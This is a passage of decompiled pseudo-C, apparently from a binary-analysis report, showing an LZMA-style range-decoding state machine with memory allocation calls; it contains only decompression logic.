                                                                                  							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                  							asm("cdq");
                                                                                  							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                  							 *(_t613 - 0x3c) = _t604;
                                                                                  							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                  							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                  							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                  							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                  								L10:
                                                                                  								if(_t612 == 0) {
                                                                                  									L12:
                                                                                  									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                  									goto L15;
                                                                                  								} else {
                                                                                  									goto L11;
                                                                                  								}
                                                                                  								do {
                                                                                  									L11:
                                                                                  									_t612 = _t612 - 1;
                                                                                  									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                  								} while (_t612 != 0);
                                                                                  								goto L12;
                                                                                  							}
                                                                                  							if( *(_t613 - 4) != 0) {
                                                                                  								GlobalFree( *(_t613 - 4));
                                                                                  							}
                                                                                  							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                  							 *(_t613 - 4) = _t535;
                                                                                  							if(_t535 == 0) {
                                                                                  								goto L171;
                                                                                  							} else {
                                                                                  								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                  								goto L10;
                                                                                  							}
                                                                                  						case 1:
                                                                                  							L13:
                                                                                  							__eflags =  *(_t613 - 0x6c);
                                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                                  								 *(_t613 - 0x88) = 1;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  							_t45 = _t613 - 0x48;
                                                                                  							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                  							__eflags =  *_t45;
                                                                                  							L15:
                                                                                  							if( *(_t613 - 0x48) < 4) {
                                                                                  								goto L13;
                                                                                  							}
                                                                                  							_t547 =  *(_t613 - 0x40);
                                                                                  							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                  								L20:
                                                                                  								 *(_t613 - 0x48) = 5;
                                                                                  								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                  								goto L23;
                                                                                  							}
                                                                                  							 *(_t613 - 0x74) = _t547;
                                                                                  							if( *(_t613 - 8) != 0) {
                                                                                  								GlobalFree( *(_t613 - 8));
                                                                                  							}
                                                                                  							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                  							 *(_t613 - 8) = _t535;
                                                                                  							if(_t535 == 0) {
                                                                                  								goto L171;
                                                                                  							} else {
                                                                                  								goto L20;
                                                                                  							}
                                                                                  						case 2:
                                                                                  							L24:
                                                                                  							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                  							 *(_t613 - 0x84) = 6;
                                                                                  							 *(_t613 - 0x4c) = _t554;
                                                                                  							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                  							goto L132;
                                                                                  						case 3:
                                                                                  							L21:
                                                                                  							__eflags =  *(_t613 - 0x6c);
                                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                                  								 *(_t613 - 0x88) = 3;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  							_t67 = _t613 - 0x70;
                                                                                  							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                  							__eflags =  *_t67;
                                                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                  							L23:
                                                                                  							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                  							if( *(_t613 - 0x48) != 0) {
                                                                                  								goto L21;
                                                                                  							}
                                                                                  							goto L24;
                                                                                  						case 4:
                                                                                  							goto L133;
                                                                                  						case 5:
                                                                                  							goto L137;
                                                                                  						case 6:
                                                                                  							__edx = 0;
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__eax =  *(__ebp - 4);
                                                                                  								__ecx =  *(__ebp - 0x38);
                                                                                  								 *(__ebp - 0x34) = 1;
                                                                                  								 *(__ebp - 0x84) = 7;
                                                                                  								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                  								goto L132;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                  							__esi =  *(__ebp - 0x60);
                                                                                  							__cl = 8;
                                                                                  							__cl = 8 -  *(__ebp - 0x3c);
                                                                                  							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                  							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                  							__ecx =  *(__ebp - 0x3c);
                                                                                  							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                  							__ecx =  *(__ebp - 4);
                                                                                  							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                  							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                  							__eflags =  *(__ebp - 0x38) - 4;
                                                                                  							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  							if( *(__ebp - 0x38) >= 4) {
                                                                                  								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                  								if( *(__ebp - 0x38) >= 0xa) {
                                                                                  									_t98 = __ebp - 0x38;
                                                                                  									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                  									__eflags =  *_t98;
                                                                                  								} else {
                                                                                  									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                  								}
                                                                                  							} else {
                                                                                  								 *(__ebp - 0x38) = 0;
                                                                                  							}
                                                                                  							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                  							if( *(__ebp - 0x34) == __edx) {
                                                                                  								__ebx = 0;
                                                                                  								__ebx = 1;
                                                                                  								goto L61;
                                                                                  							} else {
                                                                                  								__eax =  *(__ebp - 0x14);
                                                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                                                  									__eflags = __eax;
                                                                                  								}
                                                                                  								__ecx =  *(__ebp - 8);
                                                                                  								__ebx = 0;
                                                                                  								__ebx = 1;
                                                                                  								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                  								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                  								goto L41;
                                                                                  							}
                                                                                  						case 7:
                                                                                  							__eflags =  *(__ebp - 0x40) - 1;
                                                                                  							if( *(__ebp - 0x40) != 1) {
                                                                                  								__eax =  *(__ebp - 0x24);
                                                                                  								 *(__ebp - 0x80) = 0x16;
                                                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  								__eax =  *(__ebp - 0x28);
                                                                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  								__eax =  *(__ebp - 0x2c);
                                                                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  								__eax = 0;
                                                                                  								__eflags =  *(__ebp - 0x38) - 7;
                                                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  								__al = __al & 0x000000fd;
                                                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                  								__eax =  *(__ebp - 4);
                                                                                  								__eax =  *(__ebp - 4) + 0x664;
                                                                                  								__eflags = __eax;
                                                                                  								 *(__ebp - 0x58) = __eax;
                                                                                  								goto L69;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 4);
                                                                                  							__ecx =  *(__ebp - 0x38);
                                                                                  							 *(__ebp - 0x84) = 8;
                                                                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                  							goto L132;
                                                                                  						case 8:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__eax =  *(__ebp - 4);
                                                                                  								__ecx =  *(__ebp - 0x38);
                                                                                  								 *(__ebp - 0x84) = 0xa;
                                                                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                  							} else {
                                                                                  								__eax =  *(__ebp - 0x38);
                                                                                  								__ecx =  *(__ebp - 4);
                                                                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                  								 *(__ebp - 0x84) = 9;
                                                                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                  							}
                                                                                  							goto L132;
                                                                                  						case 9:
                                                                                  							goto L0;
                                                                                  						case 0xa:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__eax =  *(__ebp - 4);
                                                                                  								__ecx =  *(__ebp - 0x38);
                                                                                  								 *(__ebp - 0x84) = 0xb;
                                                                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                  								goto L132;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x28);
                                                                                  							goto L88;
                                                                                  						case 0xb:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__ecx =  *(__ebp - 0x24);
                                                                                  								__eax =  *(__ebp - 0x20);
                                                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  							} else {
                                                                                  								__eax =  *(__ebp - 0x24);
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x28);
                                                                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  							L88:
                                                                                  							__ecx =  *(__ebp - 0x2c);
                                                                                  							 *(__ebp - 0x2c) = __eax;
                                                                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  							goto L89;
                                                                                  						case 0xc:
                                                                                  							L99:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0xc;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t334 = __ebp - 0x70;
                                                                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t334;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							__eax =  *(__ebp - 0x2c);
                                                                                  							goto L101;
                                                                                  						case 0xd:
                                                                                  							L37:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0xd;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t122 = __ebp - 0x70;
                                                                                  							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t122;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							L39:
                                                                                  							__eax =  *(__ebp - 0x40);
                                                                                  							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                  								goto L48;
                                                                                  							}
                                                                                  							__eflags = __ebx - 0x100;
                                                                                  							if(__ebx >= 0x100) {
                                                                                  								goto L54;
                                                                                  							}
                                                                                  							L41:
                                                                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                  							__ecx =  *(__ebp - 0x58);
                                                                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                  							 *(__ebp - 0x48) = __eax;
                                                                                  							__eax = __eax + 1;
                                                                                  							__eax = __eax << 8;
                                                                                  							__eax = __eax + __ebx;
                                                                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  							__ax =  *__esi;
                                                                                  							 *(__ebp - 0x54) = __esi;
                                                                                  							__edx = __ax & 0x0000ffff;
                                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								 *(__ebp - 0x40) = 1;
                                                                                  								__cx = __ax >> 5;
                                                                                  								__eflags = __eax;
                                                                                  								__ebx = __ebx + __ebx + 1;
                                                                                  								 *__esi = __ax;
                                                                                  							} else {
                                                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                                  								0x800 = 0x800 - __edx;
                                                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  								goto L39;
                                                                                  							} else {
                                                                                  								goto L37;
                                                                                  							}
                                                                                  						case 0xe:
                                                                                  							L46:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0xe;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t156 = __ebp - 0x70;
                                                                                  							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t156;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							while(1) {
                                                                                  								L48:
                                                                                  								__eflags = __ebx - 0x100;
                                                                                  								if(__ebx >= 0x100) {
                                                                                  									break;
                                                                                  								}
                                                                                  								__eax =  *(__ebp - 0x58);
                                                                                  								__edx = __ebx + __ebx;
                                                                                  								__ecx =  *(__ebp - 0x10);
                                                                                  								__esi = __edx + __eax;
                                                                                  								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  								__ax =  *__esi;
                                                                                  								 *(__ebp - 0x54) = __esi;
                                                                                  								__edi = __ax & 0x0000ffff;
                                                                                  								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  								if( *(__ebp - 0xc) >= __ecx) {
                                                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  									__cx = __ax;
                                                                                  									_t170 = __edx + 1; // 0x1
                                                                                  									__ebx = _t170;
                                                                                  									__cx = __ax >> 5;
                                                                                  									__eflags = __eax;
                                                                                  									 *__esi = __ax;
                                                                                  								} else {
                                                                                  									 *(__ebp - 0x10) = __ecx;
                                                                                  									0x800 = 0x800 - __edi;
                                                                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  									__ebx = __ebx + __ebx;
                                                                                  									 *__esi = __cx;
                                                                                  								}
                                                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									goto L46;
                                                                                  								}
                                                                                  							}
                                                                                  							L54:
                                                                                  							_t173 = __ebp - 0x34;
                                                                                  							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                  							__eflags =  *_t173;
                                                                                  							goto L55;
                                                                                  						case 0xf:
                                                                                  							L58:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0xf;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t203 = __ebp - 0x70;
                                                                                  							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t203;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							L60:
                                                                                  							__eflags = __ebx - 0x100;
                                                                                  							if(__ebx >= 0x100) {
                                                                                  								L55:
                                                                                  								__al =  *(__ebp - 0x44);
                                                                                  								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                  								goto L56;
                                                                                  							}
                                                                                  							L61:
                                                                                  							__eax =  *(__ebp - 0x58);
                                                                                  							__edx = __ebx + __ebx;
                                                                                  							__ecx =  *(__ebp - 0x10);
                                                                                  							__esi = __edx + __eax;
                                                                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  							__ax =  *__esi;
                                                                                  							 *(__ebp - 0x54) = __esi;
                                                                                  							__edi = __ax & 0x0000ffff;
                                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								_t217 = __edx + 1; // 0x1
                                                                                  								__ebx = _t217;
                                                                                  								__cx = __ax >> 5;
                                                                                  								__eflags = __eax;
                                                                                  								 *__esi = __ax;
                                                                                  							} else {
                                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                                  								0x800 = 0x800 - __edi;
                                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  								__ebx = __ebx + __ebx;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  								goto L60;
                                                                                  							} else {
                                                                                  								goto L58;
                                                                                  							}
                                                                                  						case 0x10:
                                                                                  							L109:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0x10;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t365 = __ebp - 0x70;
                                                                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t365;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							goto L111;
                                                                                  						case 0x11:
                                                                                  							goto L69;
                                                                                  						case 0x12:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								__eax =  *(__ebp - 0x58);
                                                                                  								 *(__ebp - 0x84) = 0x13;
                                                                                  								__esi =  *(__ebp - 0x58) + 2;
                                                                                  								goto L132;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x4c);
                                                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                  							__ecx =  *(__ebp - 0x58);
                                                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                                                  							__eflags = __eax;
                                                                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                  							goto L130;
                                                                                  						case 0x13:
                                                                                  							__eflags =  *(__ebp - 0x40);
                                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                                  								_t469 = __ebp - 0x58;
                                                                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                  								__eflags =  *_t469;
                                                                                  								 *(__ebp - 0x30) = 0x10;
                                                                                  								 *(__ebp - 0x40) = 8;
                                                                                  								L144:
                                                                                  								 *(__ebp - 0x7c) = 0x14;
                                                                                  								goto L145;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x4c);
                                                                                  							__ecx =  *(__ebp - 0x58);
                                                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                                                  							 *(__ebp - 0x30) = 8;
                                                                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                  							L130:
                                                                                  							 *(__ebp - 0x58) = __eax;
                                                                                  							 *(__ebp - 0x40) = 3;
                                                                                  							goto L144;
                                                                                  						case 0x14:
                                                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                  							__eax =  *(__ebp - 0x80);
                                                                                  							goto L140;
                                                                                  						case 0x15:
                                                                                  							__eax = 0;
                                                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  							__al = __al & 0x000000fd;
                                                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                  							goto L120;
                                                                                  						case 0x16:
                                                                                  							__eax =  *(__ebp - 0x30);
                                                                                  							__eflags = __eax - 4;
                                                                                  							if(__eax >= 4) {
                                                                                  								_push(3);
                                                                                  								_pop(__eax);
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 4);
                                                                                  							 *(__ebp - 0x40) = 6;
                                                                                  							__eax = __eax << 7;
                                                                                  							 *(__ebp - 0x7c) = 0x19;
                                                                                  							 *(__ebp - 0x58) = __eax;
                                                                                  							goto L145;
                                                                                  						case 0x17:
                                                                                  							L145:
                                                                                  							__eax =  *(__ebp - 0x40);
                                                                                  							 *(__ebp - 0x50) = 1;
                                                                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                  							goto L149;
                                                                                  						case 0x18:
                                                                                  							L146:
                                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                                  								 *(__ebp - 0x88) = 0x18;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							__ecx =  *(__ebp - 0x70);
                                                                                  							__eax =  *(__ebp - 0xc);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							_t484 = __ebp - 0x70;
                                                                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                  							__eflags =  *_t484;
                                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  							L148:
                                                                                  							_t487 = __ebp - 0x48;
                                                                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                  							__eflags =  *_t487;
                                                                                  							L149:
                                                                                  							__eflags =  *(__ebp - 0x48);
                                                                                  							if( *(__ebp - 0x48) <= 0) {
                                                                                  								__ecx =  *(__ebp - 0x40);
                                                                                  								__ebx =  *(__ebp - 0x50);
                                                                                  								0 = 1;
                                                                                  								__eax = 1 << __cl;
                                                                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                  								__eax =  *(__ebp - 0x7c);
                                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                                  								goto L140;
                                                                                  							}
                                                                                  							__eax =  *(__ebp - 0x50);
                                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  							__eax =  *(__ebp - 0x58);
                                                                                  							__esi = __edx + __eax;
                                                                                  							 *(__ebp - 0x54) = __esi;
                                                                                  							__ax =  *__esi;
                                                                                  							__edi = __ax & 0x0000ffff;
                                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  								__cx = __ax;
                                                                                  								__cx = __ax >> 5;
                                                                                  								__eax = __eax - __ecx;
                                                                                  								__edx = __edx + 1;
                                                                                  								__eflags = __edx;
                                                                                  								 *__esi = __ax;
                                                                                  								 *(__ebp - 0x50) = __edx;
                                                                                  							} else {
                                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                                  								0x800 = 0x800 - __edi;
                                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  								 *__esi = __cx;
                                                                                  							}
                                                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
